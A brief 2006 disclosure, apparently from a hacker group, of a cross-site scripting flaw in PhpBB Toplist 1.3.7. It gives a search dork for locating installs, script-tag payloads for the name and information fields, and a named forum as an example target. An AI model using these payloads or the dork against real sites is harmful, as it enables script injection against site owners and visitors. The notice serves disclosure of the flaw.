Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15347
HistoryDec 09, 2006 - 12:00 a.m.

PhpBB Toplist 1.3.7 Xss Vuln.

2006-12-0900:00:00
vulners.com
7

LiderHack.Org

script name : PhpBB Toplist 1.3.7

#Dork : toplist.php?f=toplistnew

Risk : High

Found By : St@rExT

Vulnerable file : Toplist.php

New add sites addres: toplist.php?f=toplistnew

#Name: [xss code]
&
#Information: [xss code]
&
#Name: <h1>Your name</h1>
&
#Name: <script>alert("yourmessage")</script>

#example sites : http://www.nfl-forum.net/toplist.php

Submit

Thanks : Dekolax , ShaFuck31 , ST@ReXT , Dekolax , Swat_Hack , Maverick , Candark , Torlaq , Woheras

, Siruas

E-mail: Starext[at]msn[dot]com

         ##################### --Tьrkьm -- ####################